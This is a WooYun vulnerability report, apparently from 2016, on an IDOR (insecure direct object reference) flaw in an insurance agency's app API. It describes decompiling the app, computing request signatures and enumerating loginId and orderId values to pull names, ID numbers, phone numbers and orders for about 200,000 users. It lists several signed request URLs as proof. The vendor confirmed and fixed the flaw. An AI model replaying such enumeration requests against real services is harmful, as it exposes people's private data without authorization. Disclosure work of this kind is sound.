当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169407

漏洞标题:新一站某处越权获取用户信息(20w用户姓名/证件号/手机号/无数订单详情)

相关厂商:新一站保险代理有限公司

漏洞作者: 路人甲

提交时间:2016-01-12 18:22

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-13: 厂商已经确认,细节仅向厂商公开
2016-01-23: 细节向核心白帽子及相关领域专家公开
2016-02-02: 细节向普通白帽子公开
2016-02-12: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

RT

详细说明:

官网下APP,APP未混淆,可反编译,存在越权漏洞,所以。结合以上,遍历获取用户信息。
sig算法

QQ截图20160111184659.png


菜逼写个脚本算sig

QQ截图20160112165434.png


之后用burpsuite跑起来
用户资料,用过修改loginid

QQ截图20160111180302.png


loginid已达20w,涉及用户姓名,手机号,身份证号,邮箱等

QQ截图20160111175252.png


订单列表,20w用户的订单,不计其数

QQ截图20160111180302.png


QQ截图20160111181028.png


订单详情,通过orderid越权

QQ截图20160112165150.png


QQ截图20160112165317.png


联系人列表,涉及身份证/护照等证件号,手机号,姓名等

QQ截图20160112170954.png


QQ截图20160112171031.png


提供几条信息,方便验证

联系人列表
www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200089&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=F584F8DEE3492219E71DBE4939C12F9
www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200098&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=8E1EBB71226D0322AB7E1ACD2DB7FAAA
www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200140&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=AD00126B33B3A61570A14251BBD8B137
www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200113&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=A5B30D4D28406ECDC568DE9C364EB65E
订单详情
www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098051&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=7B7182B2D3D5FC0D44B7777C9A162A8F
www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098134&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=45FC12B7B62FA7CAB0E8530C08DC941A
www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098008&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=3C52B16E7F1D4C2274AC6A7DB0CDC56B
查询用户信息
www.xyz.cn/api/user/get?loginId=200101&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=2D23DC841F2F5616867024FDF185703E
www.xyz.cn/api/user/get?loginId=200091&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=E9C0909F22CBC5E6190A52F91B5DCF1C
www.xyz.cn/api/user/get?loginId=200092&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=02043C74D504604CB64FAE5DDE5D7BC2


漏洞证明:

修复方案:

代码混淆,修复越权 加密串修改
测试获得的数据已删除,无备份

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-13 09:32

厂商回复:

非常感谢!我们会在今天修复。
Rank20已经不足以表达我们的谢意!洞主记得看私信。

最新状态:

2016-01-13:洞主记得认领并私信我们。谢谢!